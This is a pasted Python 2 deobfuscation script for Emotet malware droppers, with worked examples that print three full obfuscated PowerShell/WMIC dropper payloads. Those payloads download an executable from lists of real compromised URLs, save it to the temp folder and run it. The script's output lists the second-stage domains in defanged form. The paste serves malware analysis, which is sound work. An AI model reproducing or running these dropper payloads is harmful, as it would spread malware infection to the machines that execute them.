Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import re
- import sys
- def main_menu():
- print ("1. WMIC Format \n2. PowerShell Format\n3. Array Format\n")
- menu = raw_input("Enter Choice [1-3] : ")
- if menu == "1":
- wmic_format()
- elif menu == "2":
- new_format()
- elif menu == "3":
- old_format()
- else:
- print ("Invalid Choice")
- main_menu()
- def wmic_format():
- # Gets the entire wmic input
- a = raw_input("Enter the WMIC command\n")
- # Finds the numbers in the wmic command and removes any single digit numbers
- wmic = re.sub("\[.*?char.*?\]", "[char]", a, flags=re.I)
- # Finds all of the numbers (char values)
- wmic = re.findall('\d+', wmic)
- # Only checks for characters greater than 10 (non NULL) and less than 127 (Max ASCII char)
- wmic = [i for i in wmic if 30 <= int(i) < 127]
- # Replaces any + symbol and ' symbol
- a = a.replace("'", "").replace("+", "")
- # Sends the string to remove the 3 digit chars, this is done twice to ensure all is caught
- result = remove_chars(a, wmic)
- result = remove_chars(result, wmic).replace(".", "[.]").replace("http://", "")
- # Splits the results by =, displays what we think should be the http array (6)
- x = 6
- temp_result = result.split("=")
- # If this is not the correct domain listing we have the choice to change which array is run through
- print temp_result[x]
- x = array_select(temp_result, x)
- # If there are any other characters that were not removed this function will do so
- print temp_result[int(x)]
- extra_chars(result, x)
- # After we get the good result this lets us restart the script if needed
- menu_end()
- def new_format():
- # Gets the user to input characters from 36 to 125
- a = raw_input("Enter the numbers/characters from 36 to 125\n")
- # Regular Expression looking for any numbers
- a = re.findall('\d+', a)
- # Joins the split characters, maps ints to char, then strips the http:// replaces . with [.] and splits the string
- a = ''.join(map(lambda x: chr(int(x)), a)).replace(".", "[.]").replace("http://", "").split("'")
- # Prints only the URLs (second array, since it is split by ')
- print a
- # After we get the good result this lets us restart the script if needed
- menu_end()
- def old_format():
- # Enter the character values in the brackets
- a = raw_input("Enter the Character Values\n").replace("','", ";").split(";")
- # Enters Integer array used to determine character placement
- b = raw_input("Enter the Integer Array Output Sequence\n").split("{")
- # Removes all brackets around the numbers
- s = [s.replace('}', '') for s in b]
- # Deletes the first blank array
- del s[0]
- # Outputs the blocks of characters in order forming URLs in stdout
- for i in range(len(s)):
- c = int(s[i])
- sys.stdout.write(a[c].replace("'", "").replace(".", "[.]")),
- # After we get the good result this lets us restart the script if needed
- menu_end()
- def remove_chars(a, wmic):
- # Runs a for loop looking for three characters to filter out of the string
- for i in range(len(wmic) - 2):
- num = chr(int(wmic[i]))
- num2 = chr(int(wmic[i + 1]))
- num3 = chr(int(wmic[i + 2]))
- # Takes the characters and combines them into a 3 character string then removes them
- num4 = num + num2 + num3
- a = a.replace(num4, '')
- return a
- def extra_chars(result, x):
- # Since they are not always using [char] values some need to be manually entered
- b = raw_input("Are there any more 3 character strings to replace? (y/n)\n").lower()
- # This if statement allows the user to manually enter 3 characters (no error checking)
- # then removes that from the string
- if b.startswith('y'):
- c = raw_input("Enter the characters to replace\n")
- a = result.replace(c, '').replace("http://", "")
- temp_result = a.split("=")
- print temp_result[x]
- extra_chars(a, x)
- elif b.startswith('n'):
- good_result = result.split("=")
- printed_results = good_result[x].split("?")
- print "\n".join(printed_results)
- else:
- print ("Invalid Choice")
- extra_chars(result, x)
- def array_select(temp_result, x):
- # This will allow the user to change which array is manipulated
- # Emotet has changed from 10 to 6 recently so this is to help future proof the script
- # This is put in for the first run through, on first run X = 6
- # If you enter an invalid choice it will be equal to n
- if x != ('n'):
- x = raw_input("Does this array display the domains? (y/n)\n")
- if x.startswith('y'):
- return True
- if x.startswith('n'):
- m = 1
- for s in temp_result:
- print m, s
- m += 1
- b = raw_input("What piece of the Array contains the URLs?\n")
- try:
- temp_result[int(b) - 1]
- print temp_result[int(b) - 1]
- y = raw_input("Does this array display the domains? (y/n)\n")
- if y.startswith('y'):
- return int(b) - 1
- if y.startswith('n'):
- array_select(temp_result, x)
- except (IndexError, ValueError):
- print "Invalid Array"
- x = 'n'
- array_select(temp_result, x)
- def menu_end():
- # Allows script to be re-run for more decoding
- e = raw_input("\n\nPress 1 to restart, any other key to quit\n")
- if e == "1":
- main_menu()
- else:
- exit(0)
- # Runs the main menu
- main_menu()
- ------------------------------------------------------------------------------
- An example of how this script works using the new wmic format
- 1. WMIC Format
- 2. PowerShell Format
- 3. Array Format
- Enter Choice [1-3] : 1
- Enter the WMIC command
- cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %CpPrlXwPi%=p^o^w^er&&set %ihOoOEWWJO%=^sh^ell&&!%CpPrlXwPi%!!%ihOoOEWWJO%! " (('iNvoK'+'e-ExprESsION (((sRI .sRI+sRI ((Get-VARIable KRh*MDR*KRh).name[3'+',11,2]-joInKsRI+sRIRhKRhsRI+sRI)( ((KR'+'sRI+sRIh& ( M3gENV:cOMSsRI+sRIPEC[4,26,25]-joINh'+'0Eh0E)sRI+sRI ( (hsRI+sRI0EDHyh0E+h0KRh+KRhEnsadasRI+sRIsh0E+h0Ed = &h0E+h0E(h0E'+'+h0ERujKRh+KRhnRuh0E+h0Ej+h0E+h0ERuh0E+hKRh+KRh0Ejh0E+h0Eeh0E+h0ERh0E+'+'h0Euj+Ru'+'jh0E+h0KRh+sRI+sRIKRhEw-objh0E'+'+KRh+'+'KRhh0Eeh0E+h0EcRuj+RujtRh0E+h0Euj) randomsRI'+'+sRI;DHyYYU = h0E+h0E.(RujneRuj+RujwRuj+h0E+h0ERuh0E+h0Ej-objectRh0EsRI+sRI+h0Eu'+'j) S'+'yh0E+h0Estem.Net.WebClieh0'+'E+h0Ent;DHyNSB = DHyh0E+h'+'0Ensad'+'h0E'+'+h0KRh+KRhEasdKRh+K'+'Rh.nextKRh+KRh(10000'+', '+'2821sRI+sRI'+'3'+'3);DHyADCX = Ru'+'j sRI+sRI htsRI+sRItp://tesh0E+h0Eth0E+h0E.magsRI+sRInh0E+h0EusRI+sRImsph0E+h0Eort.com'+'/k1u6dtwh0E+h0sRI+sR'+'IE/?httph0E+h0E:h0E+h0E//wwwh0'+'E'+'+hKRh+KRh0E.sbkh0E+h0Etraveh0E+hsRI+sRI0El.com.mysRI+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+sRI+sRIhsRI+sRI0Elida.rosRI+sRI'+'/0LCh0E+sRI+sR'+'Ih0ETG2/h0E+h0E?h0E+h0Ehh0E+sRI+sRIhKRsRI+sRIh'+'+KRh0Ettp:/h0E+h0E/sph0E+h0sRI+sRIEortid.net/02wh0E+h0Edi/Ruj.h0E+h0ESplKRh+KRh'+'i'+'t(Ruj?sRI+sRIRusRI+sRIj);DHh0E+h0EySh0E'+'+h0EDh0E+h0'+'ECh'+'0E+h0'+'E = h0E+h0EDHyenh0E+h0Ev:p'+'ubh0E+h0E'+'lKRh+KRhih0E+h0Ec + Ruh0E+KRh+KRhh0KRh+KRhEjA0h0E+h0EGRuj + DHyNSB + (Rh0E+sRI+sRIh0Euj.sRI+sRIexRusRI+sRIj+Rujeh0E+h0ERuj)h0EsRI'+'+sRI+h0E;h0E+h0KRh+KRhEforeach(hsRI+sRI0E+h0EDHyah0E+h'+'0Esh0sRI+sRIE+KRh+K'+'Rhh0Efc inh0E+h0E h0E+h0EDHKRh+sRI+sRIKRhh0E+h0EyADCX)h0E+h0E{'+'trh0E+h0Eyh0E+h0E{DHyYYh0E+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+KRh4iyP4Nh0E+h0Egh0E+h0ENd5(), h0EKRsRI+sRIh+KRh+hsRI+sRI0EDHySDC);&sRI+sRI(RujInvoRuj+RujkRusRI+sRIjh0E+h0E+Ruje-Ih0E+h0Eth0E+h0EemRh0E+h0Eujh0E+hKRh+KRh0E)(DHySDC);brh0E+h'+'sR'+'I+sRI0Eeak;}catch{}}h0KRh+KRhE).replaCE(sRI+sRIh0EsRI+sRINd5h0E,[StrinG][c'+'HAr]34)'+'KRh+KRh.replaCE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh) -crEpLAce ([ChAr]104+[ChAr]48+[ChAr]69)'+',[ChAr]39 -'+'crEpLAce ([ChAr]50+[ChAr]111+[ChAr]85),[ChAr]92'+' -REpLAcE([ChArsRI+sRI]77+[ChAr]5'+'1'+'+[ChAr]103),[ChAr]'+'36))sRI) -CrEPlACe ([CHAR]75+[CHA'+'R]82+[CH'+'AR]104),[CHAR]39) )')-crePlaCE([CHaR]115+[CHaR]82+[CHaR]73),[CHaR]39) |&( $PSHOme[4]+$psHome[30]+'x')
- Ruj test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
- Does this array display the domains?
- y
- Ruj test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/Ruj[.]SplKRhKRhit(Ruj?Ruj);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- Ruj
- test[.]magnumsport[.]com/k1u6dtw/?wwwhKRhKR[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?hhKRhKRttp://sportid[.]net/02wdi/[.]SplKRhKRhit(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- hKR
- test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]SplKRhit(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- y
- Enter the characters to replace
- KRh
- test[.]magnumsport[.]com/k1u6dtw/?www[.]sbktravel[.]com[.]my/MoGJD/?dorschdi[.]com/ly4Iv/?www[.]hopadilida[.]ro/0LCTG2/?sportid[.]net/02wdi/[.]Split(?);DHySDC
- Are there any more 3 character strings to replace? (y/n)
- n
- test[.]magnumsport[.]com/k1u6dtw/
- www[.]sbktravel[.]com[.]my/MoGJD/
- dorschdi[.]com/ly4Iv/
- www[.]hopadilida[.]ro/0LCTG2/
- sportid[.]net/02wdi/[.]Split(
- );DHySDC
- An example of how this script works using the Join format
- https://www.hybrid-analysis.com/sample/4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4?environmentId=100
- base64 decoded and NUL characters removed provides this output
- & ( $eNv:PubLIc[13]+$eNV:puBLic[5]+'X')( ( '36q119:115~99~114x105z112~116;32z61x32J110q101&119q45z111J98&106x101z99~116G32~45%67%111x109q79q98;106%101:99&116x32x87q83%99z114x105J112:116x46:83x104q101:108x108z59J36G119J101z98z99%108%105&101x110~116J32:61z32~110z101q119;45:111J98x106%101:99%116%32z83G121&115q116%101~109G46G78J101q116~46z87:101~98J67z108~105z101;110q116q59~36x114:97;110;100G111q109x32q61&32z110%101;119J45J111%98J106~101%99&116z32q114x97&110&100%111%109J59G36&117:114~108G115~32%61;32q39~104~116G116z112%58~47~47~98q97J103:112:114&105&110%116~101q114G46z99&111x109;47q105x47q44%104:116;116z112%58G47%47x98;114&111:97J100~97z118:101J110%117J101G46~99&111&109:46G97&117&47:67z82x47G44J104%116q116q112G58J47q47:115z112:121%114q97:108G119:101G98&46:99&111G109J47J105~110&118z97;114q47q110;107;108;79G105J77;47%44:104x116G116~112~58;47J47z102:99;116&100x101;118:46x99z111q109:47&120G98G117G121x88z47q44x104G116x116J112%58x47q47z99;98%111J120z46:100%107G47%118&85J83x106J65%122G86q71J114J47:39&46z83:112z108;105~116&40:39q44J39z41~59z36J110G97J109x101z32q61G32z36;114J97q110:100%111z109:46q110J101z120x116x40q49;44G32:54%53&53z51%54~41~59;36&112%97%116q104~32z61G32q36J101z110G118~58G116:101%109&112%32%43~32G39:92&39q32z43G32G36:110:97&109~101x32q43x32;39&46%101:120G101~39~59~102;111;114G101q97x99G104x40:36~117G114z108z32~105%110q32J36z117%114G108:115x41z123z116J114G121J123q36x119J101G98&99G108J105G101;110~116x46%68~111&119:110q108;111q97z100%70%105x108G101z40~36G117%114;108;46G84J111:83J116%114&105&110x103G40x41&44&32q36G112:97z116~104z41q59~83%116~97&114G116q45G80;114z111;99~101z115q115q32:36&112z97&116x104~59;98J114:101G97%107&59&125:99~97J116x99z104z123G119q114J105%116~101G45x104~111z115J116%32x36J95z46~69%120%99&101z112q116x105z111J110z46;77&101&115x115x97q103z101&59J125z125'-split'z' -SplIT'x' -sPLIT':' -SpLit'J' -sPLiT '&' -sPLIT';' -SplIT'%' -sPLIT '~'-SpLiT'q'-Split'G'|fOREacH-OBjecT {([char][iNT] $_) }) -jOIN '' )
- Type 1 for New format
- Pate from the 36 until the 125 before the split (do not include the ' ')
- The script will provide you with an output of
- bagprinter[.]com/i/,broadavenue[.]com[.]au/CR/,spyralweb[.]com/invar/nklOiM/,fctdev[.]com/xbuyX/,cbox[.]dk/vUSjAzVGr/
- These are the new second-stage domains for the Emotet domains.
- This second example shows numbers only
- https://www.hybrid-analysis.com/sample/0c34b872ba2266c2028e27c9fc9bed8fe9c6f04221695e19c5194200a9638d6e?environmentId=100
- base64 decoded and NUL characters removed provides this output
- [CHar[]] (36, 119 , 115 , 99, 114, 105, 112,116,32, 61 ,32 , 110, 101 , 119 ,45,111, 98 ,106, 101 ,99 , 116,32 ,45, 67 ,111 , 109 , 79 ,98, 106 , 101 , 99 ,116,32,87,83,99 , 114 , 105 , 112 ,116, 46 ,83 , 104, 101 ,108 , 108 ,59, 36, 119 , 101 , 98, 99,108, 105 , 101 , 110 ,116, 32, 61 , 32, 110, 101,119, 45 ,111,98 ,106, 101 ,99 ,116,32 ,83,121 , 115 , 116 , 101,109 ,46 , 78 , 101 , 116, 46, 87 ,101, 98 ,67 ,108, 105,101, 110,116 , 59,36 ,114, 97 , 110 , 100 , 111,109,32,61, 32, 110,101 ,119 , 45,111 , 98 ,106 ,101 ,99 , 116 , 32,114, 97,110 ,100 ,111 , 109 , 59 , 36,117 , 114 ,108 ,115 ,32 ,61 , 32 ,39,104 , 116 ,116 ,112 ,58,47 ,47 , 103,97 , 109 ,109 , 101 ,108 , 103 ,114, 97, 118, 108, 105 ,110, 103 , 101 , 110, 46 ,99 , 111,109, 47,100 , 108, 84 ,77 ,104,47,44 , 104,116,116 , 112 , 58,47 , 47,97,99,101 , 106 , 97, 112, 97 , 110 , 46 ,110 , 101 ,116 , 47,98, 121 ,103 ,47 , 44 ,104,116 , 116 , 112, 58 , 47 , 47 ,70 , 108 ,111 , 114,105 ,115 ,115 ,97 ,110 , 116 , 70 , 105, 114, 101 ,46,99,111 ,109,47 ,97, 115, 112,110 ,101,116 ,95,99, 108 , 105 , 101 , 110 ,116, 47,71,99,99 ,119, 117, 111 ,102, 47, 44,104 ,116, 116,112 ,58,47,47 , 101,116,101,114 , 110, 97,108 ,97,109 ,111 , 117, 114 ,46, 99 , 111 , 109,47 ,66, 73 , 72,103 , 47,44 ,104, 116 ,116 ,112,58, 47,47,98 ,97,99, 104,117, 101 , 46,99 , 111,46 , 117 , 107 , 47 , 81, 74 ,47, 39,46 , 83, 112 ,108 , 105, 116 , 40,39 , 44 , 39 , 41,59 , 36, 110 ,97 ,109 , 101 ,32 ,61,32, 36 , 114 , 97, 110, 100 , 111 ,109 , 46,110 ,101 ,120 ,116 ,40 ,49, 44, 32,54 , 53, 53 , 51 ,54 ,41 ,59 , 36 ,112 , 97 ,116 ,104 , 32 ,61, 32 ,36,101,110 , 118, 58 ,116 , 101 ,109, 112 , 32 , 43, 32 , 39 , 92 , 39,32,43,32 , 36 ,110, 97 , 109,101 ,32 ,43, 32,39, 46, 101 ,120 ,101, 39 , 59, 102,111 ,114, 101,97 ,99, 104 ,40, 36 ,117, 114 ,108, 32,105 ,110 , 32 ,36, 117 ,114 , 108,115 , 41,123, 116 , 114 , 121 , 123 , 36 ,119 , 101,98 , 99,108 ,105 ,101,110 ,116 ,46 ,68 , 111 , 119 ,110, 108,111,97 , 100 ,70 , 105, 108 ,101 ,40 , 36 ,117 , 114 , 108 ,46 ,84,111,83 , 116 , 114, 105, 110 , 103 ,40 ,41, 44, 32 ,36,112, 97, 116 , 104 ,41 ,59 , 83 , 116 , 97, 114, 116 ,45,80 ,114,111, 99 , 101 ,115 , 115, 32 ,36,112, 97,116 ,104 , 59,98 , 114 , 101, 97,107 ,59 , 125, 99 ,97 ,116,99 , 104 , 123 ,119, 114 , 105 , 116 ,101 ,45,104,111 , 115 ,116 ,32,36, 95, 46 , 69 ,120 ,99 , 101,112, 116 , 105 ,111 ,110 ,46, 77 , 101 , 115 ,115 ,97 , 103,101, 59, 125, 125) -JoIN''| &( $shelliD[1]+$ShELlid[13]+'x')
- Type 1 for New Format
- Pate from the 36 until the 125 (do not include the ())
- The script will provide you with an output of
- gammelgravlingen[.]com/dlTMh/,acejapan[.]net/byg/,FlorissantFire[.]com/aspnet_client/Gccwuof/,eternalamour[.]com/BIHg/,bachue[.]co[.]uk/QJ/
- These are the new second-stage domains for the Emotet domains.
Add Comment
Please, Sign In to add comment